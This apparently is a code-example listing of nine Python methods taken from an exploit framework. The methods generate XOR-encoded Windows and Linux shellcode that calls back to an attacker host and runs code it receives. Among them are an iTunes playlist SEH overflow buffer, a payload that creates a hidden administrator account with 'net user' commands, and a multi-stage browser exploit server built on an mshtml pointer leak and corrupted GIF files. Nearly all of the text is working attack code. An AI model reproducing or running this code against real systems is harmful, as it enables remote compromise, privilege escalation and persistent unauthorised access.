Exemple #1
0
    def createShellcode(self):
        #self.shellcode="\xcc"*400
        #return 1
        host=self.callback.ip
        port=self.callback.port
        import shellcodeGenerator
        sc=shellcodeGenerator.win32()
        #no gocode - too big
        #sc.addAttr("GOFindSock",None)
        #sc.addAttr("LoadRegAsFD", {"reg" : "esi"})
        #sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
        sc.addAttr("tcpconnect",{"port":port,"ipaddress":host})
        sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF

        sc.addAttr("UseWS2Ordinal",None)
        rawshellcode=sc.get()
        import xorencoder
        enc=xorencoder.simpleXOR()
        enc.subesp=5000
        enc.setbadstring(self.badstring)
        ret=enc.find_key(rawshellcode)
        if ret==0:
            self.log("Could not generate key for this shellcode!")
            raise Exception, "No shellcode generated"
        
        self.shellcode=enc.encode(rawshellcode)
        if self.shellcode=="":
            raise Exception, "No shellcode generated"
        self.log("Xor key used: %x"%enc.getkey())
        self.log("Length of shellcode=%s"%len(self.shellcode))
        return ret
Exemple #2
0
    def createShellcode(self):
        #get us a clean stack to play with and save the original EBP for continuation of execution

        injectme = self.createWin32Shellcode_universal(self.badstring, self.callback.ip, self.callback.port)

        sc = shellcodeGenerator.win32()
        sc.vProtectSelf=False
        sc.vAllocSelf = False
        sc.addAttr("findeipnoesp", {"subespval": 0})
        sc.addAttr("InjectToSelf", { "injectme" : injectme })
        self.shellcode = sc.get()

        self.badstring = "\00"
        enc=xorencoder.simpleXOR()
        enc.subesp=5000
        enc.setbadstring(self.badstring)
        ret=enc.find_key(self.shellcode)
        
        if ret==0:
            self.log("Could not generate key for this shellcode!")
            raise Exception, "No shellcode generated"

        self.shellcode=enc.encode(self.shellcode)
        if self.shellcode=="":
            raise Exception, "No shellcode generated"
        self.log("Xor key used: %x"%enc.getkey())
        self.log("Length of shellcode=%s"%len(self.shellcode))

        return len(self.shellcode)    
Exemple #3
0
 def createShellcode(self):
     import shellcodeGenerator
     sc = shellcodeGenerator.win32()
     sc.addAttr('findeipnoesp', {'subespval': 0})
     sc.addAttr('revert_to_self_before_importing_ws2_32', None)
     sc.addAttr('tcpconnect', {
         'port': self.callback.port,
         'ipaddress': self.callback.ip
     })
     sc.addAttr('CreateThreadRecvExecWin32',
                {'socketreg': 'FDSPOT'})  #MOSDEF
     sc.addAttr('ExitThread', None)
     rawshellcode = sc.get()
     import xorencoder
     encoder = xorencoder.simpleXOR()
     encoder.setbadstring(self.badstring)
     ret = encoder.find_key(rawshellcode)
     if ret == 0:
         self.log('Could not find a key for this shellcode!')
         raise Exception, 'No shellcode generated'
     self.shellcode = encoder.encode(rawshellcode)
     if self.shellcode == '':
         raise Exception, 'No shellcode generated'
     self.log('Xor key used: %x' % (encoder.getkey()))
     self.log('Length of shellcode=%s' % (len(self.shellcode)))
     return self.shellcode
Exemple #4
0
 def createShellcode(self):
     sc = shellcodeGenerator.win32()
     sc.addAttr('SearchCodeSafeSEH', {'tag': 0x6b303063})  #'c00k'
     sc.standalone = 1
     rawshellcode = sc.get()
     encoder = xorencoder.simpleXOR()
     encoder.setbadstring(self.badstring)
     encoder.find_key(rawshellcode)
     self.searchcode = encoder.encode(rawshellcode)
     #print len(self.searchcode),repr(self.searchcode)
     self.createWin32Shellcode('', self.callback.ip, self.callback.port)
     return self.shellcode
Exemple #5
0
    def buildCodeThingies(self):
        lc = self.lc
        lc_off = self.lc_off
        call_esp = self.call_esp
        distance_to_ret = self.distance_to_ret

        varz5 = 'AAAA' + lc + 'BBBB' + 'CCCC'
        varz4 = lc + 'DDDD' + 'EEEE' + 'FFFF'
        varz3 = lc + lc + 'GGGG' + self.dodgy
        varz2 = 'IIII' + 'JJJJ' + 'KKKK' + 'LLLL'
        varz1 = 'MMMM' + 'NNNN' + lc_off + 'OOOO'
        varz0 = '{{{{' + 'PPPP' + 'QQQQ'

        self.varsled = varz5 + varz4 + varz3 + varz2 + varz1 + varz0 + 'RRRR' + call_esp
        self.varsled += mosdef.assemble('jmp $-%d' % (100 + distance_to_ret),
                                        'x86')

        stackfix = """
		subl $0xABCD,%esp
		movl %esp,%ebp
		"""
        self.shellcode = mosdef.assemble(stackfix, "X86")

        self.sc = shellcodeGenerator.linux_X86()
        self.sc.addAttr(
            'mmap_callback', {
                'host': self.callback.ip,
                'port': self.callback.port,
                'do_setuid': False,
                'do_exit': False
            })
        self.sc = self.sc.get()

        self.log("checking for encoder")

        if '\r' in self.sc or '\n' in self.sc:
            self.log("Needs to be encoded..")
            encoder = xorencoder.simpleXOR()
            encoder.setbadstring("\x0a")
            ret = encoder.find_key(self.sc)
            if ret == 0:
                self.log("could not make shellcode, xor failure")
                raise Exception, "No shellcode possible with xor. customize it?"
            self.sc = encoder.encode(self.sc)
            if self.sc == "":
                raise Exception, "no shellcode generated?"
        else:
            self.log("no encoder needed")

        self.shellcode += self.sc
        return self.shellcode
Exemple #6
0
    def makefile(self):
        sc = shellcodeGenerator.win32()
        sc.addAttr('findeipnoesp', {'subespval': 0})
        sc.addAttr('revert_to_self_before_importing_ws2_32', None)
        sc.addAttr('tcpconnect', {
            'port': self.callback_port,
            'ipaddress': self.callback_ip
        })

        mosdef_type = self.engine.getMosdefType(canvasengine.WIN32MOSDEF_INTEL)
        mosdef_id = self.engine.getNewMosdefID(self)

        sc.addAttr("send_universal", {
            "mosdef_type": mosdef_type,
            "mosdef_id": mosdef_id
        })

        sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'})
        sc.addAttr("ExitThread", None)
        sc.vAllocSelf = True  #we need to move to another page!
        rawshellcode = sc.get()

        import xorencoder
        enc = xorencoder.simpleXOR()
        enc.setbadstring(self.badstring)
        ret = enc.find_key(rawshellcode)

        if ret == 0:
            self.log("Could not generate key for this shellcode!")
            raise Exception, "No shellcode generated"

        self.shellcode = enc.encode(rawshellcode)

        crash = '#EXTINF:,'
        padding = "\x90" * 12
        """
        Itunes modifies my shellcode on position 244 adding 1 to the byte.
        For this reason i substract 1 to the byte on the position 244 of shellcode.
        Also for this same reason \x01 is also added to self.badstring for avoid \x00 in the middle of shellcode.
        """

        self.shellcode = self.shellcode[:244] + chr(
            ord(self.shellcode[244]) - 1) + self.shellcode[245:]
        morepadding = "\x90" * (751 - (len(self.shellcode[252:])))
        morepadding += "\xe9\x10\xFC\xFF\xFF"  # jmp far
        nextSEH = "\xeb\xF9\x90\x90"  # jmp short
        seh = "\x0b\x0b\x28\x00"  # call [ebp+30]
        buf = crash + padding + self.shellcode + morepadding + nextSEH + seh

        return buf
Exemple #7
0
 def encodeshellcode(self, rawshellcode):
     import xorencoder
     encoder = xorencoder.simpleXOR()
     encoder.setbadstring(self.badstring)
     ret = encoder.find_key(rawshellcode)
     if ret == 0:
         self.log('Could not find a key for this shellcode!')
         raise Exception, 'No shellcode generated'
     self.shellcode = encoder.encode(rawshellcode)
     if self.shellcode == '':
         raise Exception, 'No shellcode generated'
     self.log('Xor key used: %x' % (encoder.getkey()))
     self.log('Length of shellcode=%d' % (len(self.shellcode)))
     print repr(self.shellcode[:16])
     return self.shellcode
Exemple #8
0
    def createShellcode(self):

        if self.version == 3:
            import shellcode.clean.windows.payloads as payloads
            p = payloads.payloads()
            sc = p.win32_exec(
                "cmd.exe /c net user c c /ADD && net localgroup administrators c /ADD"
            )
            rawshellcode = p.assemble(sc)
        else:
            sc = shellcodeGenerator.win32()
            sc.addAttr('findeipnoesp', {'subespval': self.subesp})
            if self.version == 1:
                sc.addAttr('Fix RtlEnterCriticalSection', {'SimpleFix': 1})
            if self.callback.ip == '0.0.0.0':
                sc.addAttr('BindMosdef', {'port': self.callback.port})
            else:
                sc.addAttr('tcpconnect', {
                    'port': self.callback.port,
                    'ipaddress': self.callback.ip
                })
                sc.addAttr('RecvExecWin32', {'socketreg': 'FDSPOT'})  #MOSDEF
            sc.addAttr('ExitThread', None)
            rawshellcode = sc.get()

        encoder = xorencoder.simpleXOR()
        encoder.setbadstring(self.badstring)
        ret = encoder.find_key(rawshellcode)
        if ret == 0:
            self.log('Could not find a key for this shellcode!')
            raise Exception, 'No shellcode generated'
        self.shellcode = encoder.encode(rawshellcode)
        if self.shellcode == '':
            raise Exception, 'No shellcode generated'
        self.log('Xor key used: %x' % (encoder.getkey()))

        self.log('Length of shellcode=%s' % (len(self.shellcode)))
        self.shellcode = '\x90' * (487 - len(self.shellcode)) + self.shellcode
        return self.shellcode
Exemple #9
0
    def makesploit(self, clientheader, clientbody):
        h = header('SERVER')
        b = body()

        if self.plugin_info:
            self.log("We got a plugin info for this target - thanks clientd!")
            info_dict   = self.plugin_info
            user_agent  = info_dict['user_agent']

            if self.is_vulnerable(info_dict):
                self.log("This client is most likely vulnerable!")
            else:
                self.log("Bailing on this client as it is not likely to be vulnerable.")
                return None, None
        else:
            user_agent = clientheader.getStrValue(['User-Agent'])

        # check if we need to use an info leak or not
        if "Windows NT 6.1" in user_agent:
            # info leaking
            self.use_leak = True

        if clientheader.URL.endswith(self.filename):
            self.log('Serving HTML file')

            if self.use_leak:
                html = self.generate_html_first_stage_win7()
            else:
                self.create_shellcode()
                html = self.generate_html_winxp()

            b.setBody(html)
            h.addHeader('Content-Type','text/html')

        elif clientheader.URL.endswith('.gif'):
            gif_file = ""
            if clientheader.URL.endswith('spray.gif'):
                self.log('Serving GIF spray file')
                gif_file = self.spray_gif
            elif clientheader.URL.endswith('pad.gif'):
                self.log('Serving GIF pad file')
                gif_file = self.pad_gif
            elif clientheader.URL.endswith('leak1.gif'):
                self.log('Serving GIF leak1 file')
                gif_file = self.leak_1_gif
            elif clientheader.URL.endswith('leak2.gif'):
                self.log('Serving GIF leak2 file')
                gif_file = self.leak_2_gif
            elif clientheader.URL.endswith('corrupt_xp.gif'):
                self.log('Serving GIF win xp corruption file')
                gif_file = self.corrupt_xp_gif
            elif clientheader.URL.endswith('corrupt_7.gif'):
                self.log('Serving GIF win 7 corruption file')
                gif_file = self.corrupt_7_gif

            a = open(gif_file, "rb")
            gif = a.read()
            a.close()

            b.setBody(gif)
            h.addHeader('Content-Type',  'image/gif')
            # h.addHeader('Expires',       'Tue, 1 Jan 3000 00:00:00 GMT')
            # h.addHeader('Cache-Control', 'max-age=31536000, public')

        elif clientheader.URL.endswith('addr1'):
            # we got mshtml base, start second stage
            leaked_pointer = int(clientheader.URL.split(".")[0].replace("/", ""))
            self.log("mshtml base: 0x%x" % leaked_pointer)
            self.log("shellcode 1st dword: 0x%x" % (leaked_pointer + 0x351404))
            self.log("shellcode 2nd dword: 0x%x" % (leaked_pointer + 0x339219))

            self.log('Serving second stage HTML')

            # cloneNode() truncates null bytes on clones
            badstring = '\0'
            self.create_shellcode()

            encoder = xorencoder.simpleXOR()
            encoder.setbadstring(badstring)
            ret = encoder.find_key(self.shellcode)

            if not ret:
                self.log("Could not generate a xor key for this shellcode")
                raise Exception, "XOR key not generated"

            self.shellcode = encoder.encode(self.shellcode)
            html = self.generate_html_second_stage_win7(leaked_pointer)

            b.setBody(html)
            h.addHeader('Content-Type','text/html')

        elif clientheader.URL.endswith('addr2'):
            # we got shellcode addr, start third stage
            leaked_pointer = int(clientheader.URL.split(".")[0].replace("/", ""))
            self.log("Shellcode @ 0x%x" % leaked_pointer)

            self.log('Serving third stage HTML')

            html = self.generate_html_third_stage_win7(leaked_pointer)

            b.setBody(html)
            h.addHeader('Content-Type','text/html')

        elif clientheader.URL.count("exit"):
            self.log('Max retries reached. Exploit failed.')
            h.status='302'
            h.addHeader('Location',"http://www.google.com")
            h.addHeader('Content-Type','text/html')
            return h, b

        else:
            self.log('Redirecting to self')
            h.status='302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type','text/html')

        return h, b